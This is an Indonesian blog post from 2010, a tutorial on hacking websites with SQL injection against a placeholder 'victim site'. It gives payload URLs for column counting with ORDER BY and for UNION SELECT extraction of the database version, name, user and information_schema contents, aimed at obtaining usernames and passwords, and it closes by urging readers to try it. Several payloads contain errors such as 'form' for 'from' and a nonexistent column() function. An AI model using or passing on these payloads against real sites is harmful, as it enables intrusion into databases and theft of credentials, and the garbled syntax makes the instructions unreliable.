Hacking Dengan SQL Injection

| 4 Agu 2010


Pada kenyataannya, SQL Injection terbukti merupakan salah satu teknik terbaik yang sering melumpuhkan sasarannya.

Langsung saja Ke intinya:

Untuk mengetahui apakah suatu aplikasi web di serang oleh sql injection atau tidak,kita coba dengan menambahkan single quotes (‘) pada URL,contoh:

www.situskorban.com/news.php?id=1

dan jika situs tersebut bisa diinjeksi maka akan keluar pesan error

dan langsung saja anda cari berapa jumlah table databasenya,gunakan syntak order By dan jangan lupa dengan akhiran /*,#,%00,atau –

sebagai contoh :

http://www.situskorban.com/news.php?id=1+order+by+1-

Tidak ada error

http://www.situskorban.com/news.php?id=1+order+by+2-

tidak ada error

http://www.situskorban.com/news.php?id=1+order+by+3-

tidak ada error

http://www.situskorban.com/news.php?id=1+order+by+4-

ada error yang muncul (Misalnya) dan jika belum da error yang muncul hingga angka berikutnya,

Tes diatas memperlihatkan bahwa table database dari situs korban adalah 3 karena ketika anda memasukan angka 4 terjadi error.

Selanjutnya gunakan Union Function untuk mencari angka mana yang bisa kita injection lebih lanjut

http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11-

lalu anda cari Informasi lebih lanjuttentang database korban,misalnya untuk mencari versi database yang di gunakan anda gunakan

http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-

untuk mengetahui nama database

http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-

untuk mengetahui Username dari data korban

http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-

untuk mengetahui isi database

http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,column(),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+table-

atau dengan menggunakan information_schema,

http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,concat(table_name,’,table_schema),6,7,8,9,10,11,12,13,14,15,16,17,18,19+form+information_schema.table+limit+1+offset+18-

selanjutnya tinggal anda melanjutkan membuka table –table databasenya dengan menggunakan nama table dan dapatkan username dan passwordnya

Selamat Mencoba..........

Mohon Commentnya !

1 komentar:

Anonim at: 6 Agustus 2010 pukul 08.38 mengatakan...

mantap

Posting Komentar

PLEASE INSERT CRITIC AND SUGGESTIONS
BECAUSE, YOU SUGGESTED USEFUL FOR ME

 

Copyright © 2010 War In Horror | Design by Dzignine